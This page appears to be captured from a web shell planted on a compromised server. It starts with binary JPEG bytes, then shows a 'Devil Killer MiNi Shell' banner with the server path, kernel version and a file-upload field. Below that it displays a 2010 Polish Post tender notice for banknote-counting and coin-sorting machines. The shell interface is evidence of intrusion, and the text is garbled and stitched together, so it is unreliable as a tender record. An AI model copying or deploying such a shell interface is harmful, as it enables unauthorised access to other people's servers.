JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101118/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101118/374404-N-2010.html

<p class="kh_header"><b>Lublin: Dostawę maszyn do obsługi pieniędzy</b><br>
<b>Numer ogłoszenia: 374404 - 2010; data zamieszczenia: 18.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Lublinie , ul. Wacława Moritza 2, 20-900 Lublin, woj. lubelskie, tel. 81 7106300, 7106301, 7106302, faks 81 7106300, 7106301, 7106302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: usługi pocztowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę maszyn do obsługi pieniędzy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się zakres rzeczowy, który obejmuje:
a) - część I: dostawę 5 sztuk maszyn do liczenia banknotów w paczkach (pod opaską, banderolowanych), szczegółowy opis przedmiotu zamówienia oraz miejsca użytkowania maszyn przedstawione zostały w załączniku nr 3.1.1 do SIWZ Charakterystyka i parametry techniczne maszyn stanowiących przedmiot dostawy

- część II: dostawę 6 sztuk maszyn skanujących do liczenia banknotów luzem, szczegółowy opis przedmiotu zamówienia oraz miejsca użytkowania maszyn przedstawione zostały w załączniku nr 3.1.2 do SIWZ Charakterystyka i parametry techniczne maszyn stanowiących przedmiot dostawy.;
- część III: dostawę 4 sztuk maszyn do sortowania bilonu, szczegółowy opis przedmiotu zamówienia oraz miejsca użytkowania maszyn przedstawione zostały  w załączniku nr 3.1.3 do SIWZ Charakterystyka i parametry techniczne maszyn stanowiących przedmiot dostawy.;
- część IV: dostawę jednej maszyny do próżniowego pakowania banknotów, szczegółowy opis przedmiotu zamówienia oraz miejsca użytkowania maszyn przedstawione zostały w załączniku nr 3.1.4 do SIWZ Charakterystyka i parametry techniczne maszyn stanowiących przedmiot dostawy.;
- część V: dostawę jednej maszyny do liczenia banknotów, szczegółowy opis przedmiotu zamówienia oraz miejsca użytkowania maszyn przedstawione zostały załącznik nr 3.1.5 do SIWZ Charakterystyka i parametry techniczne maszyn stanowiących przedmiot dostawy.
b) instalację i uruchomienie dostarczonych maszyn w miejscach ich użytkowania, 
c) przeszkolenie wyznaczonych pracowników użytkownika w zakresie podstaw obsługi eksploatacyjnej, bezpiecznej pracy oraz bieżącej konserwacji dostarczonych i zainstalowanych maszyn.
d) zapewnienie gwarancyjnej obsługi serwisowej na warunkach określonych w § 7 projektu umowy.
Szczegółowy opis realizacji zamówienia zawiera projekt umowy, który stanowi załącznik nr  3 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.13.22.00-5, 30.12.36.10-6, 42.92.13.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> III.1) WADIUM
Informacja na temat wadium: Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert w wysokości: 
Część I - 1 500 zł (słownie: jeden tysiąc pięćset zł 00/100) Część II - 2 000 zł (słownie: dwa tysiące zł 00/100) Część III - 1 000 zł (słownie: jeden tysiąc zł 00/100) Część IV - 200 zł (słownie: dwieście zł 00/100) Częśc V - 100 zł (słownie: sto zł 00/100). 
Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek przeprowadzającego postępowanie: Poczta Polska S.A., Centrum Infrastruktury Oddział Regionalny w Lublinie, ul. Wacława Moritza 2, 20-900 Lublin. Wadium powinno być wniesione przed upływem terminu składania ofert. Wadium przetargowe należy wpłacić na konto:
Bank Pocztowy  S. A.  Nr 85 1320 0019 0099 0718 2000 0025
Dopuszczalne są również inne formy wniesienia wadium przewidziane przez ustawę Prawo zamówień publicznych:
-	poręczenia bankowe lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-	gwarancje bankowe;
-	gwarancje ubezpieczeniowe;
-	poręczenia udzielane przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. nr 42 poz. 275).
Wykonawca, który nie wniesie wadium przetargowego zostanie wykluczony z ubiegania się o udzielenie zamówienia publicznego o którym mowa w niniejszej SIWZ.
Wnoszona gwarancja ubezpieczeniowa lub bankowa musi mieć charakter samoistny, nieodwołalny, bezwarunkowy oraz płatny na każde żądanie.
Gwarancja wnoszona w innej formie niż pieniężna musi obejmować cały okres związania ofertą i zawierać w swojej treści podstawy do jej realizacji zgodne z podstawami utraty wadium zawartymi w art. 46 ust. 5 ustawy oraz art. 46 ust. 4 a.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcą zamówienia może być osoba fizyczna, osoba prawna, albo jednostka organizacyjna nie posiadająca osobowości prawnej. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, na potwierdzenie czego przedstawią oświadczenie w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu metodą warunku granicznego - spełnia/nie spełnia na podstawie treści złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcą zamówienia może być osoba fizyczna, osoba prawna, albo jednostka organizacyjna nie posiadająca osobowości prawnej. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące posiadania niezbędnej wiedzy i doświadczenia:
- wymagane jest przedłożenie wykazu wykonanych dostaw maszyn do obsługi pieniędzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentów potwierdzających, że te dostawy zostały wykonane należycie (np. referencje); Wymagane jest wykonanie w ww. okresie dostaw, których wartość brutto  jest nie mniejsza niż:
- część I:   60 000,00 zł,
- część II:  90 000,00 zł,
- część III: 40 000,00 zł,
- część IV:  9 000,00 zł,
- część V:   4 000,00 zł.
Uwaga: w przypadku złożenia przez jednego Wykonawcę oferty na więcej niż jedną część zamówienia wymagane jest wykonanie w przedmiotowym okresie dostaw o wartości nie mniejszej niż suma wyżej wymienionych kwot wymaganych dla poszczególnych części , dla których składana jest oferta.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu metodą warunku granicznego - spełnia/nie spełnia na podstawie treści złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcą zamówienia może być osoba fizyczna, osoba prawna, albo jednostka organizacyjna nie posiadająca osobowości prawnej. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące dysponowaniem odpowiednim potencjałem technicznym , na potwierdzenie czego przedstawią oświadczenie w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu metodą warunku granicznego - spełnia/nie spełnia na podstawie treści złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcą zamówienia może być osoba fizyczna, osoba prawna, albo jednostka organizacyjna nie posiadająca osobowości prawnej. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące dysponowaniem osobami zdolnymi do wykonania zamówienia, na potwierdzenie czego przedstawią oświadczenie w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu metodą warunku granicznego - spełnia/nie spełnia na podstawie treści złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcą zamówienia może być osoba fizyczna, osoba prawna, albo jednostka organizacyjna nie posiadająca osobowości prawnej. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej, na potwierdzenie czego przedstawią oświadczenie w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu metodą warunku granicznego - spełnia/nie spełnia na podstawie treści złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony przez Wykonawcę dla właściwej części zamówienia załącznik pod nazwą: Elementy charakterystyki i parametrów technicznych maszyny do     .        Wzór stanowią załączniki: nr  2.1 (część I), 2.2 (część II), 2.3 (część III), 2.4 (część IV), 2.5 (część V) do SIWZ.
2) Wypełniony dla właściwej części zamówienia formularz ofertowy stanowiący załączniki nr: 1.1 (cześć I), 1.2 (cześć II), 1.3 (część III), 1.4 (część IV), 1.5 (część V) do SIWZ 
3) Kopia dokumentu potwierdzającego wniesienie wadium. W przypadku wnoszenia wadium w innej formie niż pieniężna oryginały dokumentów wadium muszą być złożone u Zamawiającego najpóźniej do upływu terminu składania ofert lub dołączone do oferty. W przypadku składania oferty więcej niż na jedną część zamówienia, należy zsumować wartości wadium dla poszczególnych części zamówienia;
4) Dokument lub dokumenty z których będzie wynikać uprawnienie do podpisania oferty np.: aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki. W przypadku, gdy oferta jest podpisywana przez pełnomocnika-pełnomocnictwo.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia następujących zmian w umowie:
1)	zmiana terminów określonych w niniejszej umowie, pod warunkiem, że:
a)	zmiana będzie wynikała z niezależnych przyczyn leżących po stronie Zamawiającego,
b)	zmiana będzie wynikała z udokumentowanych, nie zawinionych przyczyn leżących po stronie Wykonawcy,
2)	zmiany wysokości wynagrodzenia, w przypadku zmiany przepisów prawnych, w szczególności pod warunkiem wejścia w życie przepisów wprowadzających zmiany w wysokości stawek podatku VAT, które pozostają w związku z umową i zastosowanie których jest wymagane dla działania stron zgodnie z obowiązującym porządkiem prawnym,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poczta-polska.pl/O_Firmie/?d=przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska S. A., Centrum Infrastruktury Oddział Regionalny w Lublinie, ul. Moritza 2, 20-900 Lublin budynek biurowy, II piętro, pokój nr 201..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2010 godzina 12:00, miejsce: Poczta Polska S. A., Centrum Infrastruktury Oddział Regionalny w Lublinie, ul. Moritza 2, 20-900 Lublin budynek biurowy, II piętro, pokój nr 206/3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa 5 sztuk maszyn do liczenia banknotów w paczkach (pod opaską, banderolowanych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się zakres rzeczowy, który obejmuje:
a) - część I: dostawę 5 sztuk maszyn do liczenia banknotów w paczkach (pod opaską, banderolowanych), szczegółowy opis przedmiotu zamówienia oraz miejsca użytkowania maszyn przedstawione zostały w załączniku nr 3.1.1 do SIWZ Charakterystyka i parametry techniczne maszyn stanowiących przedmiot dostawy.
b) instalację i uruchomienie dostarczonych maszyn w miejscach ich użytkowania, 
c) przeszkolenie wyznaczonych pracowników użytkownika w zakresie podstaw obsługi eksploatacyjnej, bezpiecznej pracy oraz bieżącej konserwacji dostarczonych i zainstalowanych maszyn.
d) zapewnienie gwarancyjnej obsługi serwisowej na warunkach określonych w § 7 projektu umowy.
Szczegółowy opis realizacji zamówienia zawiera projekt umowy, który stanowi załącznik nr 3 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.13.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa 6 sztuk maszyn skanujących do liczenia banknotów luzem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się zakres rzeczowy, który obejmuje:
a) - część II: dostawę 6 sztuk maszyn skanujących do liczenia banknotów luzem, szczegółowy opis przedmiotu zamówienia oraz miejsca użytkowania maszyn przedstawione zostały w załączniku nr 3.1.2 do SIWZ Charakterystyka i parametry techniczne maszyn stanowiących przedmiot dostawy.;
b) instalację i uruchomienie dostarczonych maszyn w miejscach ich użytkowania, 
c) przeszkolenie wyznaczonych pracowników użytkownika w zakresie podstaw obsługi eksploatacyjnej, bezpiecznej pracy oraz bieżącej konserwacji dostarczonych i zainstalowanych maszyn.
d) zapewnienie gwarancyjnej obsługi serwisowej na warunkach określonych w § 7 projektu umowy.
Szczegółowy opis realizacji zamówienia zawiera projekt umowy, który stanowi załącznik nr  3 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.13.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa 4 sztuk maszyn do sortowania bilonu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się zakres rzeczowy, który obejmuje:
a)  część III: dostawę 4 sztuk maszyn do sortowania bilonu, szczegółowy opis przedmiotu zamówienia oraz miejsca użytkowania maszyn przedstawione zostały  w załączniku nr 3.1.3 do SIWZ Charakterystyka i parametry techniczne maszyn stanowiących przedmiot dostawy.;
b) instalację i uruchomienie dostarczonych maszyn w miejscach ich użytkowania, 
c) przeszkolenie wyznaczonych pracowników użytkownika w zakresie podstaw obsługi eksploatacyjnej, bezpiecznej pracy oraz bieżącej konserwacji dostarczonych i zainstalowanych maszyn.
d) zapewnienie gwarancyjnej obsługi serwisowej na warunkach określonych w § 7 projektu umowy.
Szczegółowy opis realizacji zamówienia zawiera projekt umowy, który stanowi załącznik nr  3 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.36.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa jednej maszyny do próżniowego pakowania banknotów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się zakres rzeczowy, który obejmuje:
a) - część IV: dostawę jednej maszyny do próżniowego pakowania banknotów, szczegółowy opis przedmiotu zamówienia oraz miejsca użytkowania maszyn przedstawione zostały w załączniku nr 3.1.4 do SIWZ Charakterystyka i parametry techniczne maszyn stanowiących przedmiot dostawy.;
b) instalację i uruchomienie dostarczonych maszyn w miejscach ich użytkowania, 
c) przeszkolenie wyznaczonych pracowników użytkownika w zakresie podstaw obsługi eksploatacyjnej, bezpiecznej pracy oraz bieżącej konserwacji dostarczonych i zainstalowanych maszyn.
d) zapewnienie gwarancyjnej obsługi serwisowej na warunkach określonych w § 7 projektu umowy.
Szczegółowy opis realizacji zamówienia zawiera projekt umowy, który stanowi załącznik nr  3 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.92.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa jednej maszyny do liczenia banknotów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się zakres rzeczowy, który obejmuje:
a)- część V: dostawę jednej maszyny do liczenia banknotów, szczegółowy opis przedmiotu zamówienia oraz miejsca użytkowania maszyn przedstawione zostały załącznik nr 3.1.5 do SIWZ Charakterystyka i parametry techniczne maszyn stanowiących przedmiot dostawy.
b) instalację i uruchomienie dostarczonych maszyn w miejscach ich użytkowania, 
